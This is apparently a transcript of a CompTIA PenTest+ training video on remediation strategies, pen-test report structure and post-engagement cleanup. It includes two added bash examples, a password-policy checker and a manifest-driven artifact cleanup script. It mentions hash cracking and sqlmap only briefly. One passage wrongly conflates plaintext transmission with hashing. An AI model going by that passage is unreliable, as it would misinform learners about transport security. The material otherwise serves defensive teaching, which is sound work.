to the question of why the pen tester should also recommend, not only detect and tell the client but also recommend mitigations, tell the client how that could be fixed, for example: the pen tester knows more, for a very simple fact, he or she was able to find that vulnerability. Now these recommendations can be done before the report or in the report, but they must be done. In some situations, for example when there is a trigger such as prior compromise or critical finding, well, you don't want to wait until the final report to write a recommendation; you want to do the recommendation on the spot, as you find them. Now a mitigation might involve not only technology resources but also processes and human resources. What does that mean? We tend to think that to fix something, when it comes to IT, we have to use a tool. Well, there are several different situations where probably a tool will help you, or it will help the client, but not only that: processes and human resources most likely will be involved as well in order to mitigate that problem. For example, let's say that you find out that there are no password changing policies, so users can define any password they want, they can even use a blank password. Okay, so you can use a tool in order to prevent that from happening; however, there is something that has been done by the staff, by the employees. If that's the case, just deploying a tool will not be enough. So that tool may help the client to define no empty passwords anymore; the tool can help your client to define, okay, passwords will now have to be eight characters long, at least eight characters long, they must have lowercase and uppercase characters, symbols and numbers, just an example. Okay, that's good. The problem is, if that employee that defined a password as nothing, that just had a blank password, an empty password, there is a very high probability that the same employee will write that new password down on a Post-it paper and leave it under the keyboard, for example, or paste it on the monitor. So there are situations that will involve the employees as well. There are even situations that will require changing processes, updating processes. So a process involves how the company works, or how a specific department works, or how a few employees of a specific department work. So for example, every day when the employee arrives at the company, he or she must log in, but if he's going to take a break, a five-minute break to have some coffee, that user must log out and then log in again. Well, our users don't do that. Okay, so there must be a change in the process, not only in human resources but in the process: how is that schedule fitting in the employees' schedule? Maybe there should be a different approach that would convince those employees to log out and then log in again. So the way that something occurs can be updated, can be changed, in order to improve something. Now when vulnerabilities or some flaws are found we have to deploy some remediation; the client must deploy some remediation, and you as a pen tester must be aware that there are some remediation strategies, because there are some problems that are found in networks, in systems, that are very common. So the CompTIA PenTest+ exam demands remediation strategies for a few different, actually six different, problems: so different approaches, remediation strategies, to different problems. The first problem is shared administration credentials. It's very common to see, for example, a company that has many servers, and since it's a large company they don't have just one sysadmin, for example, or one network analyst, they have more than one, and all of those must be able to run administrative tasks, use administrative tools, perform administrative events.
Since the system by default will only have one single administrative user, let's say if it's a Unix system the root user, if it's a Windows system the admin user, usually what companies do is share those credentials, so all the network analysts know that same user and password, they know those same credentials. The problem with that is, if something happens, the company will not be able to tell who actually caused that problem. Now how can you remediate, how can you mitigate that problem? Let's say for example that it's a Linux environment: you can deploy the sudo system, the sudo tool, so each analyst will have their own limited user, but then you can say, okay, these users here can run these tools as root, so they can perform administrative tasks, but each of those will use their own credentials, their own user account. If something happens, you'll be able to tell who it was. Plain text and/or weak passwords. Well, first of all, plain text passwords should never be used; we saw that in the past. And when I say plain text I'm not saying, for example, let's say that the password is 123456, if someone captures traffic, sniffs the network, that person will see 123456. Okay, that's not even the case; when we have a plain text transmission it's probably going to be hashed, but we saw in the previous modules that cracking hashes can be very simple, so this should not be used. Whenever possible you should use TLS or SSL APIs, libraries, so the password, the credentials, the authentication phase, should be encrypted, along with the transmission, the data transmission, as well. Also prevent from allowing weak passwords. Users, employees, usually tend to use weak passwords because they want to remember them; there is a very high probability of forgetting a password. So you should use some techniques to force the users to define good passwords. That's why the company should define, not you but the company should define, password changing policies. A tool that can help the client, the company, to do that, if it's a Linux environment, and I'm always focusing on Linux because these topics here are usually associated with servers, because all this is controlled by servers and most of the servers are Linux servers, okay, now in a Linux environment a subsystem called PAM can help the client to deploy that. There are several different solutions; Windows has that as well, not PAM but other alternatives. But what is important is, taking PAM as an example, using this subsystem the client will be able to define, for example, how long the password should be, how frequently the employees should change their passwords, if that password can match a previous password, how many previous passwords it should differ from. So
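The kind of password rules just listed (minimum length, mixed character classes, and "must differ from the last N passwords"), written as a bash check. This is an added example, not PAM's configuration and not the course's material; the history of previous passwords is a constructed sample, and plain SHA-256 is used for it only to keep the example short, whereas a real system would store salted password hashes.

```bash
#!/usr/bin/env bash
# Added example: enforce a password policy of the kind the video says PAM can
# apply. Constructed sample data; hashing is unsalted SHA-256 for brevity only.

MIN_LENGTH=8
HISTORY_DEPTH=3   # how many previous passwords the new one must differ from

# Hash stdin with whichever SHA-256 tool the host provides (portability only).
hash_pw() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum; else shasum -a 256; fi | cut -d' ' -f1
}

# Constructed sample history of previous password hashes, oldest first.
HISTORY="$(printf '%s' 'Summer2023!' | hash_pw)
$(printf '%s' 'Winter2023!' | hash_pw)
$(printf '%s' 'Spring2024!' | hash_pw)"

# Prints "ok" and returns 0 when the candidate satisfies every rule; otherwise
# prints the first rule it fails and returns 1, so the user knows what to fix.
check_password_policy() {
    pw=$1
    if [ "${#pw}" -lt "$MIN_LENGTH" ]; then
        echo "too short (minimum $MIN_LENGTH characters)"; return 1
    fi
    case $pw in *[a-z]*) ;; *) echo "needs a lowercase letter"; return 1 ;; esac
    case $pw in *[A-Z]*) ;; *) echo "needs an uppercase letter"; return 1 ;; esac
    case $pw in *[0-9]*) ;; *) echo "needs a digit"; return 1 ;; esac
    case $pw in *[!a-zA-Z0-9]*) ;; *) echo "needs a symbol"; return 1 ;; esac
    # History rule: only the most recent HISTORY_DEPTH entries are compared.
    h=$(printf '%s' "$pw" | hash_pw)
    if printf '%s\n' "$HISTORY" | tail -n "$HISTORY_DEPTH" | grep -qx "$h"; then
        echo "matches one of the last $HISTORY_DEPTH passwords"; return 1
    fi
    echo "ok"
}

# Sample run with constructed candidates.
for candidate in 'Abc1!' 'Winter2023!' 'Autumn2024!'; do
    printf '%-14s %s\n' "$candidate" "$(check_password_policy "$candidate")"
done
```

The order of the checks matters for usability: cheap rules (length, character classes) are reported first, and the history comparison, which is the one that needs the stored hashes, runs last.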
all this can be defined, and again there are different types of tools that will allow the client to do that. Now always remember that what you as a pen tester are going to do in order to figure out whether the company uses weak passwords is capture hashes, if possible, and then try to crack those passwords. Another problem: single-factor authentication. Nowadays many systems, many tools, many pieces of software support multi-factor authentication, which means not only one authentication system but more than one authentication system should be used: for example credentials, login and password, username and password, and an access code. So the user should have a phone number registered, in a way that when that user is about to log into the system, he or she will have to inform the username and password, then that user is going to receive a text, an SMS, with an access code. That's one. There are some mobile applications that will help the client to deploy that. Another one, biometrics, that's another one; an RFID card. So any type of different authentication system, not just the traditional username and password. Also remediation strategies for SQL injections. So always make sure that you identify SQL injections, but even if the pen tester doesn't identify SQL injections, the client should be aware that these types of injections are very common, so the client should always be focusing on trying to find possible SQL injection vulnerabilities. A good tool that would help the client is sqlmap, for example. And also tell the client that he or she should always be performing hardening. Hardening means the company, or at least the staff that is responsible for the security of the company's systems and infrastructure, should always be focusing on hardening, making the systems and devices safer, looking for ways of improving the configuration: so not only finding vulnerabilities, finding flaws, but improving misconfigurations, for example. And one misconfiguration that is very common to see is unnecessary services, unnecessary open services, services that are running but should not be running. Let me give you an example: if you install a new Windows server, and for some reason, maybe because it's the default or maybe because you as the network admin enabled that service by mistake during the process of installation, you install that system and IIS, the web server, the Microsoft web server, is enabled after installation. But does that Windows server really need that service, does the network, does the client really need that service? Well, if not, then it should be disabled, and this is a remediation strategy that is required by the CompTIA PenTest+ exam. Now when writing a report there is no strict formula, there is no fixed template of how to write a report, such as
these are the sections that a report should have. However, there is a common-sense standard that defines that a report should have an executive summary, or simply a summary, and this is actually the most important part of a pen testing report, because most likely this summary is not only going to be read by the IT, the technical, personnel, but also by the director, for example. So you should use some wording here that will make it easy for him or her, or for those people, to understand what's going on, and in this summary you're going to cover the entire report, but also very briefly; try to be very objective. So basically in this section what you're going to write is something like, okay, this is a report that should present what's been done and what we found: what's been done, this, this and that, very quickly, just one paragraph, maybe two, and we found some critical events, some critical vulnerabilities, such as, and just a brief listing of the main ones, and that's it. Now also you should describe, okay, and this report will also tell you how to fix these problems, and that's it. Then you move to the next section, which is findings and remediation. Here you're going to detail your findings and also describe how to remediate, how to fix those problems if possible, or at least mitigate the problem. This is going to be a section in which you're going to use more technical words, and also probably a bunch of links, in order to better explain, for example, the vulnerabilities that were found, and links to the remediation steps that could be taken. Now in the methodology section you should detail how you achieved those results, how you found those findings; here you're probably going to name the tools, but also the approach. And finally the conclusion: okay, so what's your conclusion? Once a report is delivered you have to keep in mind that this report has some critical information, most likely it has some critical information such as, for example, vulnerabilities that were found; probably it's going to list links that even describe how to exploit those vulnerabilities; it's going to have IP addresses in there, maybe even usernames and passwords. So it is a very critical document, and that is why handling this report is critical as well, which is why disposal of the digital and hard copies must be defined: how are you as a pen tester going to dispose of both the digital and the hard copies of that report? But this report must get to the hands of the person or the people that should receive it, so you have to guarantee that there is a secure transmission and also secure storage, both on your end as the pen tester and on the client's end, and the client should also determine for how long that report should be stored. So you communicated throughout the entire engagement, throughout the entire process, you finalized your report, and now you have to finalize the engagement, which basically is closing that chapter. So to finalize an engagement you have to perform what is called post-engagement cleanup. What is a post-engagement cleanup? This is a phase in which you as a pen tester will have to erase everything that you used, installed, created in that client's infrastructure. So let's say that you created scripts and installed scripts, you installed tools, you created files, whatever you did, you have to go back there and wipe that out; there should be nothing left. Everything that you've done and you've found should be presented in that report; it should not physically exist in those systems, servers, devices. So basically you have to make sure that the systems are all back to pre-engagement. Once that's all done you need the client acceptance, so a document in which you're going to get your client's signature saying, hey, this pen tester here did everything that he or she was supposed to do according to the rules of engagement and statement of work, and then you finalize that engagement. So in this video we talked about communication, writing reports, and closing an engagement, or closing a contract. Keep in mind that continuous communication is critical, but the report should ideally only be delivered as a final stage, just like when you hire a service, you pay that person when that person finishes that service, usually. So this
is the same thing you only deliver that product once it's done but then you have to do everything that is supposed to be done to close that chapter finalize that engagement close the contract I hope you enjoyed this video thank you very much
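The post-engagement cleanup described above is easy to get wrong if you rely on memory at the end of a test. One way to make it verifiable, as an added example that is not part of the course material: keep a manifest of every artifact you drop on a client host as you create it, then remove everything in the manifest and confirm nothing is left before asking for client acceptance. The manifest location and the sample artifacts are assumptions for the demonstration; in practice the manifest itself lives on the tester's machine, not on the client system.

```bash
#!/usr/bin/env bash
# Added example (not from the course): manifest-driven post-engagement cleanup.
# Every tool, script or file placed on a client host is recorded the moment it
# is created; at the end of the engagement the manifest drives removal and a
# verification pass. MANIFEST defaults to an assumed path for this demo.

MANIFEST="${MANIFEST:-/tmp/engagement-manifest.txt}"

# Record an artifact (file or directory) that was placed on the target.
# Call this right after creating it, not at the end of the engagement.
record_artifact() {
    printf '%s\n' "$1" >> "$MANIFEST"
}

# Remove every recorded artifact and print one status line per entry.
# Refuses empty or root paths so a corrupted manifest cannot wipe a host.
# Returns 0 only if every recorded path is gone afterwards.
cleanup_from_manifest() {
    rc=0
    [ -f "$MANIFEST" ] || { echo "no manifest at $MANIFEST"; return 1; }
    while IFS= read -r path; do
        case "$path" in ""|/) continue ;; esac
        if [ -e "$path" ]; then
            rm -rf -- "$path"
        fi
        if [ -e "$path" ]; then
            echo "STILL PRESENT: $path"
            rc=1
        else
            echo "removed: $path"
        fi
    done < "$MANIFEST"
    return "$rc"
}

# Count manifest entries still present on disk; 0 means the host is clean.
# Run this independently of cleanup_from_manifest as the acceptance check.
remaining_artifacts() {
    n=0
    [ -f "$MANIFEST" ] || { echo 0; return; }
    while IFS= read -r path; do
        [ -n "$path" ] && [ -e "$path" ] && n=$((n + 1))
    done < "$MANIFEST"
    echo "$n"
}

# Demo on constructed artifacts in a scratch directory (assumed layout).
demo() {
    work="$(mktemp -d)"
    MANIFEST="$work/manifest.txt"
    mkdir -p "$work/opt/pentest-tools" "$work/tmp"
    printf 'id\n' > "$work/opt/pentest-tools/enum.sh"
    printf 'constructed loot\n' > "$work/tmp/loot.txt"
    record_artifact "$work/opt/pentest-tools"
    record_artifact "$work/tmp/loot.txt"
    echo "before cleanup: $(remaining_artifacts) artifact(s) present"
    cleanup_from_manifest
    echo "after cleanup: $(remaining_artifacts) artifact(s) present"
}

# Uncomment to run the demo directly:
# demo
```

The point of the second function, remaining_artifacts, is that the check is separate from the removal: the number it reports after cleanup is the evidence you attach to the client acceptance document, and anything it still finds is a cleanup failure to resolve before the engagement is closed.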